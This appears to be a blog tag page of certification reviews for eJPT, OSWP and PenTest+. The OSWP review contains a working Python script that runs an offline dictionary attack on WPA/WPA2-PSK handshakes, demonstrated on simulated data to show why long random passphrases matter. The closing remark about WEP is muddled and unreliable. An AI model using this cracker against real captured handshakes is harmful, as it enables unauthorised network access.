Tag: penetration testing

  • eLearnSecurity Junior Penetration Tester (eJPT)

    In April 2020, I took the eJPT exam from eLearnSecurity. As the “Junior” part of the name suggests, this is an entry level exam, and I think it acts as a good stepping stone towards the eCPPT or the OSCP.

    All of eLearnSecurity’s certifications are good for life, as opposed to Cisco/CompTIA certifications which have to be renewed every 3 years; however, they update the syllabus every so often, so eJPTv2 has now replaced the original eJPT (which I did).

    This was my third penetration testing exam, and it took an interesting approach. PenTest+ is a traditional theory based exam, where you answer multiple choice questions and then a computer instantly gives you the result when you finish. OSWP is a practical exam, where I had to submit a written report and wait for a human to review it. In the eJPT exam, you are given VPN access to a network, and then you have to answer multiple choice questions based on that network. For instance, they might ask you “How many Windows services are configured for automatic startup on SERVER1?” The only way to find out is to gain access to that server, i.e. you have to actually use the skills that you’ve learnt rather than regurgitating trivia points from memory. I think this approach gives the best of both worlds, i.e. a practical test with instant results, although reports are an important skill for real-life penetration tests.

    (more…)
  • Offensive Security Wireless Professional (OSWP)

    In April 2019, I took the Offensive Security Wireless Attacks (WiFu) course and the OSWP exam. (Along with PenTest+ and Microsoft 365 Fundamentals, this was my third exam in a month!)

    In brief, I enjoyed this. I thought the content was interesting, and the exam was actually fun (similar to an escape room). However, the course material was written in 2014 and it could do with an overhaul; Offensive Security updated the OSCP in Feb 2020, so hopefully they will do the same for the OSWP at some point.

    In particular, the course objectives include these:

    • The student will learn to implement attacks against WEP encrypted networks.
    • The student will learn to implement attacks against WPA encrypted networks.
    • The student will learn alternate WEP and WPA cracking techniques.

    So, is this course/certification still relevant? How many people are actually using WEP/WPA rather than WPA2 (or open networks that don’t need cracking)? WiGLE (Wireless Geographic Logging Engine) has some stats on this. Here’s a snapshot from 2020-06-07:

    In particular:

    • 5.26% on WEP
    • 5.01% on WPA

    So, that’s about 10% of wireless networks. Based on that, I can see the skills being useful. However, when I scanned my local (residential) neighbourhood, I couldn’t find any WEP/WPA networks. Any new router from an ISP should come pre-configured with WPA2, and it’s been that way for several years now. I also wonder how up to date those stats are, i.e. whether the WEP networks still exist.

    The good news (as a pen tester) is that the same attacks will work on WPA-PSK and WPA2-PSK: both derive the pairwise master key from the passphrase and SSID in the same way, so a captured four-way handshake can be attacked offline with the same wordlist either way. According to WiGLE’s stats, 67.5% of networks use WPA2, although unfortunately they don’t show a breakdown of Personal vs. Enterprise. If you’re using WPA2-Enterprise (802.1X authentication) then there is no shared passphrase to guess, so you’re safe against these particular attacks. However, in my anecdotal experience there are a lot of WPA2-PSK networks out there.

    So, that’s a roundabout way of saying that yes, this exam is still relevant.

    If you run a wireless network (at home or at work), how worried should you be? Before I did this course, I’d already heard that WEP is essentially worthless; now that I’ve experienced this from the attacker’s perspective, I can confirm that’s true. WPA2-PSK can be cracked, but only by capturing the four-way handshake and then guessing the passphrase offline, i.e. a dictionary attack; if you’ve got a long random passphrase then you’re pretty safe, e.g.
    ~*TJ8H|^u@<)Fk05Uq}t;5?N\v(bv<4s-nT`H""yA$(ha.bEP"+jEg)"&y({Fr
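
To make the two points above concrete (the same handshake attack works on WPA-PSK and WPA2-PSK, and it is only ever a guessing attack), here is an added example of what a tool like aircrack-ng does with a captured four-way handshake. This is my own illustration, not code from the WiFu course or from any Offensive Security material. It derives the PMK with PBKDF2 (checked against the IEEE 802.11i test vector for passphrase "password" and SSID "IEEE"), expands it to the PTK, and verifies the EAPOL-Key MIC for each wordlist candidate. The only difference between WPA and WPA2 here is the MIC algorithm (HMAC-MD5 vs. truncated HMAC-SHA1). The SSID "HomeWiFi", the MAC addresses, the nonces and the EAPOL-Key message 2 frame are all constructed inside the script so it runs offline; they are not from a real capture.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Offset of the 16-byte MIC field inside an EAPOL-Key frame, counted from the
# start of the 802.1X header: 4 (802.1X hdr) + 1 (descriptor type) + 2 (key info)
# + 2 (key length) + 8 (replay counter) + 32 (nonce) + 16 (IV) + 8 (RSC) + 8 (ID).
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The 4096 rounds are the whole cost of one guess; the SSID is the salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from IEEE 802.11i. Only the first 16 bytes (the KCK) are needed to check a MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool = True) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed.
    WPA2/CCMP (key descriptor version 2) uses HMAC-SHA1 truncated to 16 bytes;
    original WPA/TKIP (version 1) uses HMAC-MD5. Everything else is identical."""
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_psk(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
              eapol_frame: bytes, wordlist: Iterable[str], wpa2: bool = True) -> Optional[str]:
    """Offline dictionary attack: the MIC in the captured frame is the only oracle.
    Returns the passphrase if it is in the wordlist, otherwise None."""
    captured = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, wpa2), captured):
            return candidate
    return None


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16, wpa2: bool = True) -> bytes:
    """Constructed EAPOL-Key message 2 (STA -> AP) with empty key data, for the demo only."""
    body = ((b"\x02" if wpa2 else b"\xfe")          # descriptor type: RSN or legacy WPA
            + (b"\x01\x0a" if wpa2 else b"\x01\x09")  # key info: pairwise, MIC set, version 2 or 1
            + b"\x00\x00"                             # key length (0 in message 2)
            + (1).to_bytes(8, "big")                  # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + mic + b"\x00\x00")                      # MIC, key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def simulate_capture(ssid: str, passphrase: str, wpa2: bool = True):
    """Stand-in for a pcap: build the handshake material as a real AP and client would.
    MAC addresses and nonces are constructed here, not taken from any real network."""
    ap_mac, sta_mac = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_msg2(snonce, wpa2=wpa2), wpa2)
    return ap_mac, sta_mac, anonce, snonce, build_msg2(snonce, mic, wpa2)


def run_demo(ssid: str, passphrase: str, wordlist: Iterable[str], wpa2: bool = True) -> Optional[str]:
    ap_mac, sta_mac, anonce, snonce, frame = simulate_capture(ssid, passphrase, wpa2)
    return crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, frame, wordlist, wpa2)


if __name__ == "__main__":
    words = ["letmein", "qwerty123", "password"]
    print(derive_pmk("password", "IEEE").hex())            # 802.11i Annex test vector
    print(run_demo("HomeWiFi", "password", words))         # recovered: password
    print(run_demo("HomeWiFi", "password", words, wpa2=False))  # same against WPA/TKIP
    print(run_demo("HomeWiFi", os.urandom(24).hex(), words))    # random passphrase: None
```

Each candidate costs 4096 HMAC-SHA1 rounds, and the SSID salt means rainbow tables only help for common network names. Against the 62-character random passphrase above, no wordlist or GPU budget gets anywhere, which is why the advice is simply "use a long random passphrase", whereas no passphrase at all makes WEP safe.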

    (more…)

  • PenTest+ (PT0-001)

    In April 2019, I took CompTIA’s PenTest+ exam. Along with CySA+, this bridges the gap between Security+ and CASP. As the name suggests, it’s all about penetration testing.

    This is a relatively new exam, and it’s still on the first release (PT0-001). Because of that, it’s not very well known, so I haven’t seen any job adverts asking for it. Personally, I took the Security+ exam in November 2016, so that was due to expire in November 2019 (along with the A+ and Network+). Doing this exam was a good way to renew all of my existing CompTIA certifications, while learning some new skills, so I don’t regret it. However, I mainly see it as a stepping stone towards a more useful certification.

    Pen testing exams generally fall into two categories: theory and practical. Like the other CompTIA exams, PenTest+ is (primarily) multiple choice. This has the advantage that it can be graded automatically by the testing software. However, it also has the downside that it’s less realistic, because it’s more fragmented. It’s entirely possible to pass this exam without ever actually doing a penetration test, which makes the certification less valuable to employers.

    As an analogy, think of a driving test. Normally, you would drive around the area for a while to demonstrate your general ability, then the examiner would ask you to perform a few manoeuvres (e.g. parallel parking). Imagine instead that the examiner drove you to a suitable location, then you swapped seats so that you could do a manoeuvre, then you swapped seats again so that they could drive you to the next location. PenTest+ feels a bit like this, e.g. they might ask you how you would set up a reverse shell but you won’t need to choose when to do that.

    (more…)